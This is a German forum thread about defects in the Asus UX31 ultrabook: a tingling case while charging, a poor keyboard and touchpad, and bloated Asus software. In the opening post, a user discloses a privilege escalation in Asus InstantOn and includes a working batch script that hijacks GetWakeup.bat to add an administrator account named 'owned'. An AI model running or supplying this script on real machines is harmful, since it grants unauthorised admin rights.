[UX31] Mehrere Probleme mit dem UX31

Hawkear

Neuling
Hardware:

Gehäuse:
Wenn das Netzteil angeschlossen ist, kribbelt es beim berühren des Notebooks. Wenn der Berührstrom klein genug ist, ist es ungefährlich und zulässig, aber meiner Meinung nach trotzdem unschön. Vor allem, da ich das Notebook oft am Netzteil habe. Die Ausrichtung der Netzteils in der Steckdose war bei mir egal, es hat immer gekribbelt.

Tastatur:
Die Tasten sind sehr unpräzise. Es ist mir schon häufig vorgekommen, dass Tastendrücke ignoriert wurden. Besonders mit Kombinationen habe ich Probleme (z.B. Taskmanager: Daumen auf STRG und Umschalt, anderer Finger auf Esc, oft wird Umschalt oder Strg nicht erkannt)
Sehr schön zu sehen, wenn man die Bildschirmtastatur öffnet und mal die STRG-Taste drückt. Drückt man am Rand bis die Taste aufliegt, leuchtet sie in der Bildschirmtastatur trotzdem noch nicht auf. Erst wenn man den Finger etwas in die Mitte bewegt, wird der Tastendruck erkannt.

Touchpad (Elantech):
Beim normalen Betrieb hatte ich schon das Gefühl, dass das klicken manchmal nicht so richtig gut funktioniert. Als ich dann die Grafikkarte mit Left4Dead getestet hatte, fiel mir auf, dass Tastendrücke manchmal nicht registriert werden. Wenn man auf das Touchpad tippt klappt es meistens, aber drückt man das Touchpad runter, dann hört man es klicken aber nichts passiert.

Software:

Asus InstantOn:
Der Service InsOnWMI.exe erstellt regelmäßig (alle 20s) eine GetWakeup.bat und GetWakeup.vbs in %LocalAppData%\Asus\InstantOn, startet die .bat, die startet die .vbs, welche dann etwas in InsOnPoCFG.txt schreibt, was ausgewertet wird, woraufhin alles wieder gelöscht wird. Das alles für eine WMI-Abfrage? Sollte man sich unnötige Schreibzugriffe auf SSDs nicht sparen? WMI-Abfragen kann man direkt aus C/C++ machen.
Das ist ausserdem eine riesige Sicherheitslücke (Privilege escalation - Rechteausweitung). Wer mal auf einem (deutschsprachigen) UX31 Adminrechte braucht, einfach die Batch starten, 20 Sekunden später gibt es einen neuen Benutzer mit den entsprechenden Rechten.
Code:
@echo off
echo net user owned owned /add > %localappdata%\ASUS\InstantOn\GetWakeup.bat
echo net localgroup Administratoren owned /add >> %localappdata%\ASUS\InstantOn\GetWakeup.bat
attrib +r %localappdata%\ASUS\InstantOn\GetWakeup.bat

Power4Gear-Minianwendung:
Das Power4Gear-Sidebar-Gadget lässt sich nicht verschieben. Wenn man also einen externen Monitor angeschlossen hatte, muss man eventuell die Anwendung schliessen und neu starten, damit sie wieder in die obere Ecke geht.

Asus ATK:
Das UX31 ist das erste Notebook seit langer Zeit, bei dem ich Treiber installieren muss, um die Lautstärke ändern zu können. Von anderen Herstellern kenne ich es, dass man Treiber für das OSD braucht, aber ohne haben die Tasten trotzdem immer funktioniert. Ich hoffe, das könnt Ihr per BIOS-Update beheben. Nicht jeder setzt Windows ein.
Ausserdem, 9 Prozesse laufen nur für das ATK-Package, davon 6 mit System-Rechten? Das sind ja mehr Prozesse als mancher Virenscanner hat, und schreit förmlich "Wir haben Systemrechte, hack uns!".

Bluetooth:
Eintrag für "radio enable" in de-DE\athbttray.exe.mui ist auf griechisch statt deutsch. Sieht man, wenn man Bluetooth ausschaltet, und wieder per Systray-Symbol einschalten will.

Mehr Software habe ich jetzt nicht getestet.

Mein Fazit:

Das Problem mit dem Berührstrom und den schlechten Eingabegeräten ist für mich schon Grund genug, das Gerät an Amazon zurückzugeben. Ich hab ein paar Tage lang versucht, mit der Tastatur klarzukommen, aber erfolglos. Schade, denn eigentlich ist es ein schönes Gerät. Ich hoffe es gibt demnächst einen Nachfolger, bei dem diese Probleme behoben sind, denn sonst habe ich noch kein Ultrabook gefunden was ich mir kaufen würde. Und bitte überarbeitet die Software, Sicherheitslücken dürfen einfach nicht sein.

Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
Hi,

danke, dass du es ansprichst. Bin froh nicht der Einzige mit diesen Problemen zu sein.

Gehäuse:
Genau dieses Problem habe ich auch... Hab's auch schon an den Asus-Support geschickt mit der (zugegebenermaßen etwas kurzen) Beschreibung: "Gehäuse steht unter Spannung (am Stromnetz)".
Als Antwort kam: "Test ok".

Sonst nix. Das Gerät steht jetzt leider noch immer unter Strom. Dies ist doch ein Garantiefall, oder nicht? Ich meine, ich bilde mir das ja nicht ein! Außerdem wurde die Originalverpackung einbehalten... nun kann ich es nicht mehr zu Amazon zurückschicken, bzw. nur noch gegen einen Aufpreis!

Keyboard:
Ich denke, es ist wirklich Gewöhnungssache. Evtl. hast Du auch ein schlechtes Modell erwischt wo dies der Fall ist. Bei mir funktioniert es wunderbar - habe keinerlei Probleme.

Touchpad:
Games sollte man nicht mit einem Touchpad zocken ;) Aber generell funktioniert es gut bei mir - diesen Punkt kann ich nicht nachvollziehen.

Software:
Runter damit, die macht sowieso nur Probleme und neues Windows drauf, dann läuft Dein System auch...

Genau dieses Problem habe ich auch... Hab's auch schon an den Asus-Support geschickt mit der (zugegebenermaßen etwas kurzen) Beschreibung: "Gehäuse steht unter Spannung (am Stromnetz)".
Als Antwort kam: "Test ok".

Sonst nix. Das Gerät steht jetzt leider noch immer unter Strom. Dies ist doch ein Garantiefall, oder nicht? Ich meine, ich bilde mir das ja nicht ein!

Wenn die Messwerte in Ordnung sind, dann ist das so zulässig. siehe auch FAQ der c't
Ich hatte leider keine Gelegenheit, das Netzteil/Notebook bei meinen Kollegen prüfen zu lassen, aber ich denke nicht, dass Asus da irgendwelche Risiken eingeht. Es ist halt nur unschön. Einige Leute, denen ich das Gerät gezeigt habe, konnten das auch nicht nachvollziehen (je nach Schuhwerk usw)

Ich denke, es ist wirklich Gewöhnungssache. Evtl. hast Du auch ein schlechtes Modell erwischt wo dies der Fall ist. Bei mir funktioniert es wunderbar - habe keinerlei Probleme.

Ich habe mich an Tastaturen gewöhnt, wo ich irgendwo auf die Tasten drücken kann. So schlecht wie hier habe ich noch keine Tastatur erlebt (zugegeben, keine hatte so einen kurzen Hub, da ist schon richtig schwer das hinzubekommen)

Games sollte man nicht mit einem Touchpad zocken ;) Aber generell funktioniert es gut bei mir - diesen Punkt kann ich nicht nachvollziehen.

Eigentlich wollte ich ja nur die Grafikleistung testen, und hab das so nebenbei gemerkt. Dass da irgendwas nicht stimmt, habe ich schon vorher gemerkt, konnte das aber nicht so genau einordnen.
Das mit dem Touchpad könnte vielleicht auch durch einen neuen Treiber verbessert werden.

Software:
Runter damit, die macht sowieso nur Probleme und neues Windows drauf, dann läuft Dein System auch...

Das war schon meine eigene Installation. Ich hab halt nur die Software installiert, wo ich nicht gleich vom Namen her ausschliessen konnte, ob ich sie brauche. Da wäre es schön, wenn Asus dazu schreiben würde, wofür das überhaupt ist.
Und an mancher Software kommt man nicht vorbei, z.B. das ATK Package.
Wie es mit Instant On aussieht weiss ich nicht, ich konnte nicht herausfinden was das macht (ausser Lücken ins System zu reissen).

Jetzt wo es angesprochen wird-> dieses Kribbeln habe ich auch - aber wohl nur wenn der Akku nicht aufgeladen ist. Etwas ärgerlich aber für mich - sofern da nichts weiter passiert - kein soo großer Kritikpunkt.

An die Tastatur gewöhne ich mich immer mehr.

Touchpad klappt eigentlich ganz gut - nur nicht immer "flüssig", was schade ist.

Aber dabei auch gleich mal eine Frage - liegt es am Touchpad, dass das Scrollen in Firefox doch sehr ruckelig ist? Oder hängt das mit der SSD zusammen - welche ja bei 4K sehr schlechte Ergebnisse hat...
In jedem Fall sollte da etwas getan werden..

Edit Kaum rege ich mich drüber auf ist doch wieder alles flüssig..

Zuletzt bearbeitet:
Wenn die Messwerte in Ordnung sind, dann ist das so zulässig. siehe auch FAQ der c't
Ich hatte leider keine Gelegenheit, das Netzteil/Notebook bei meinen Kollegen prüfen zu lassen, aber ich denke nicht, dass Asus da irgendwelche Risiken eingeht. Es ist halt nur unschön. Einige Leute, denen ich das Gerät gezeigt habe, konnten das auch nicht nachvollziehen (je nach Schuhwerk usw)
Das kribbeln nervt mich schon sehr. So stark - das kann nicht mehr innerhalb der Toleranzen liegen. Innerhalb der Toleranz heißt ja normalerweise, dass der Berührungsstrom für den Menschen nicht fühlbar ist.

Aber dabei auch gleich mal eine Frage - liegt es am Touchpad, dass das Scrollen in Firefox doch sehr ruckelig ist? Oder hängt das mit der SSD zusammen - welche ja bei 4K sehr schlechte Ergebnisse hat...
In jedem Fall sollte da etwas getan werden..
In welcher Form sich Asus zu den schlechteren SSDs bekennt steht ja noch in den Sternen. Ich hoffe aber inständig dass die es wenigstens zugeben.
Zum Browsen mit Firefox: probier mal Chrome :) Gibt derzeit keinen schnelleren Browser.
Wenn du FF treu bleiben willst, dann probiere mal auf Webseiten zu surfen, wo wenig Werbung zu finden ist und damit auch weniger Flash-Videos abgespielt werden. Evtl. frisst das so viel Leistung.

Das kribbeln nervt mich schon sehr. So stark - das kann nicht mehr innerhalb der Toleranzen liegen. Innerhalb der Toleranz heißt ja normalerweise, dass der Berührungsstrom für den Menschen nicht fühlbar ist.

Innerhalb der Toleranz heißt, dass der Strom unter 0.25mA liegt. Die Norm EN 60950-1 soll die Sicherheit gewährleisten, mehr nicht.
Natürlich könnte man den Strom auch so klein definieren, dass er nicht mehr fühlbar ist. Die meisten Notebookgehäuse sind aber immer noch aus Kunststoff. Die Hersteller müssten dann strengere Normen einhalten, obwohl die meisten Nutzer nie was davon merken werden. Also hat man Werte gewählt, die sicher sind, aber den Aufwand (und damit die Kosten) nicht zu hoch treiben.

Meiner Meinung nach sollten die Hersteller von Notebooks mit leitfähigen Gehäusen selber darauf achten, das Kribbeln zu vermeiden, denn nur zufriedene Kunden sind in Zukunft weiterhin Kunden.

Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.

Zurück
Oben Unten refresh